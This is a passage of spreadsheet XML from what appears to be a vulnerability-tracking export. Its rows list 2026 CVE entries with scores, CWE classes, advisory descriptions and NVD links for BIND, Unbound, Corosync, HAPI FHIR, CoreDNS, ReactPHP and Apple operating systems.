      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr"/>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr"/>
      <c r="Q631" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R631" s="5" t="inlineStr">
        <is>
          <t>If a BIND resolver sends a query for a DNSSEC-signed authoritative zone, and the authoritative server replies with a valid wildcard answer and signed NSEC3 proof, followed by an unsigned NSEC at the same owner name, it will trigger an unexpected program exit.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80274</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81265</t>
        </is>
      </c>
      <c r="D632" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F632" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr"/>
      <c r="Q632" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R632" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5.</t>
        </is>
      </c>
      <c r="S632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81265</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81563</t>
        </is>
      </c>
      <c r="D633" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="inlineStr"/>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr"/>
      <c r="L633" s="5" t="inlineStr"/>
      <c r="M633" s="5" t="inlineStr"/>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr"/>
      <c r="Q633" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R633" s="5" t="inlineStr">
        <is>
          <t>A BIND resolver encountering an SVCB/HTTPS AliasMode record referencing 14 or more SVCB/HTTPS ServiceMode records may fail to properly deallocate internal resources. If this happens repeatedly, resource exhaustion will eventually prevent the resolver from performing new recursive lookups.
This issue affects BIND 9 versions 9.18.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.18.11-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81563</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81634</t>
        </is>
      </c>
      <c r="D634" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F634" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr"/>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr"/>
      <c r="Q634" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R634" s="5" t="inlineStr">
        <is>
          <t>In NLnet Labs Unbound up to and including 1.26.0, a 255 length query name with a large TCP response can lead to a heap buffer overflow during the RRSet canonicalisation routine. This is caused by missing to add the first owner name into the buffer length check. A malicious actor operating a malicious name server or tampering with an incoming response to Unbound (canonicalisation happens before DNSSEC validation), can trigger the vulnerability.</t>
        </is>
      </c>
      <c r="S634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81634</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81665</t>
        </is>
      </c>
      <c r="D635" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F635" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr"/>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr"/>
      <c r="Q635" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R635" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow was found in Corosync's Totem Process Group (totempg) message reassembly. When processing fragmented multicast messages, the buffer used to reassemble fragments lacks a runtime bounds check in release builds. A network-adjacent attacker able to send crafted multicast protocol messages to the cluster could cause a heap buffer overflow with attacker-controlled data. This can crash the Corosync daemon, causing a denial of service to the entire cluster, and may potentially allow further exploitation given sufficient heap-corruption control.</t>
        </is>
      </c>
      <c r="S635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81665</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81736</t>
        </is>
      </c>
      <c r="D636" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="inlineStr"/>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr"/>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr"/>
      <c r="Q636" s="5" t="inlineStr">
        <is>
          <t>CWE-1050</t>
        </is>
      </c>
      <c r="R636" s="5" t="inlineStr">
        <is>
          <t>If a BIND resolver has cached a tree of SVCB/HTTPS AliasMode records, and is then queried for the root of that tree, the resolver will spend disproportionate CPU time constructing the response.
This issue affects BIND 9 versions 9.18.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.18.11-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81736</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81875</t>
        </is>
      </c>
      <c r="D637" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F637" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr"/>
      <c r="Q637" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-409</t>
        </is>
      </c>
      <c r="R637" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.12, SHCParser in org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java can consume attacker-controlled Smart Health Card JWT content whose header contains zip: "DEF" and whose small raw-DEFLATE payload expands to a very large value. SHCParser.decodeJWT() passes the decoded payload to SHCParser.inflate(), which accumulates all decompressed bytes in a ByteArrayOutputStream without an output-size limit before JSON parsing, and SHCParser.decompress() contains the same unbounded pattern. An application or validator service that accepts attacker-supplied SHC content can therefore suffer excessive heap allocation, severe garbage-collection pressure, request failure, process instability, or process termination. This issue is fixed in version 6.9.12.</t>
        </is>
      </c>
      <c r="S637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81875</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81876</t>
        </is>
      </c>
      <c r="D638" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F638" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="inlineStr"/>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr"/>
      <c r="Q638" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="R638" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.12, SHCParser in org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java can enter an infinite loop while processing attacker-controlled Smart Health Card JWT content whose header contains zip: "DEF" and whose raw-DEFLATE payload is empty or truncated. SHCParser.decodeJWT() reaches SHCParser.inflate(), where Inflater.inflate() can return zero while Inflater.finished() remains false and Inflater.needsInput() is true. The loop also lacks an Inflater.needsDictionary() termination check, SHCParser.decompress() contains the same zero-progress pattern, and ResourceChecker.java can reach SHC parsing during file-format detection. A malformed validation request can pin a JVM worker thread indefinitely, and concurrent requests can exhaust all validation workers. This issue is fixed in version 6.9.12.</t>
        </is>
      </c>
      <c r="S638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81876</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82399</t>
        </is>
      </c>
      <c r="D639" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F639" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="inlineStr"/>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr"/>
      <c r="Q639" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R639" s="5" t="inlineStr">
        <is>
          <t>CoreDNS is a DNS server written in Go. Prior to 1.14.7, the DNS-over-HTTPS, DNS-over-HTTP/3, DNS-over-QUIC, and DNS-over-gRPC request paths in plugin/pkg/doh/doh.go, core/dnsserver/server_quic.go, and core/dnsserver/server_grpc.go call dns.Msg.Unpack on attacker-controlled DNS section counts before dns.DefaultMsgAcceptFunc validates the fixed header. An unauthenticated client can use DNS name compression and excessive section counts to amplify allocation before the plugin chain, so plugin-level rate limiting cannot prevent concurrent requests from exhausting memory and terminating CoreDNS. The ordinary UDP and TCP listeners are not affected because they validate the header first. This issue is fixed in version 1.14.7.</t>
        </is>
      </c>
      <c r="S639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82399</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84543</t>
        </is>
      </c>
      <c r="D640" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F640" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr"/>
      <c r="Q640" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R640" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious SMB server may cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84543</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84544</t>
        </is>
      </c>
      <c r="D641" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr"/>
      <c r="Q641" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R641" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was addressed with improved input validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious NFS server may cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84544</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84549</t>
        </is>
      </c>
      <c r="D642" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr"/>
      <c r="Q642" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R642" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious NFS server may cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84549</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84563</t>
        </is>
      </c>
      <c r="D643" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F643" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr"/>
      <c r="Q643" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R643" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved checks. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84563</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84598</t>
        </is>
      </c>
      <c r="D644" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F644" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os</t>
        </is>
      </c>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr"/>
      <c r="Q644" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R644" s="5" t="inlineStr">
        <is>
          <t>A path traversal issue was addressed with improved path validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27. An attacker with physical access to a trust-paired device may be able to read and write arbitrary files.</t>
        </is>
      </c>
      <c r="S644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84598</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84629</t>
        </is>
      </c>
      <c r="D645" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E645" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F645" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr"/>
      <c r="Q645" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R645" s="5" t="inlineStr">
        <is>
          <t>This issue was addressed with additional entitlement checks. This issue is fixed in iOS 27 and iPadOS 27, tvOS 27, visionOS 27, watchOS 27. An app may be able to fingerprint the user.</t>
        </is>
      </c>
      <c r="S645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84629</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84997</t>
        </is>
      </c>
      <c r="D646" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E646" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F646" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="inlineStr"/>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr"/>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr"/>
      <c r="Q646" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R646" s="5" t="inlineStr">
        <is>
          <t>react/http is an event-driven, streaming HTTP client and server implementation for ReactPHP. From 0.6.0 until 1.11.1, React\Http\Io\ChunkedDecoder could enter an infinite loop while processing a malformed Transfer-Encoding: chunked body because handleData required its buffer to shrink on every iteration. An incomplete terminal-chunk trailer without CRLF left the buffer unchanged after strpos returned false, and exactly two non-CRLF bytes after a completed non-terminal chunk bypassed both the error and wait guards. The affected decoder processes request bodies for React\Http\HttpServer and response bodies for React\Http\Browser, allowing a malicious client to freeze a server or a malicious or compromised server to freeze a client. A reverse proxy that normalizes inbound requests may protect the server direction but does not protect outbound Browser requests. This issue is fixed in version 1.11.1.</t>
        </is>
      </c>
      <c r="S646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84997</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85189</t>
        </is>
      </c>
      <c r="D647" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
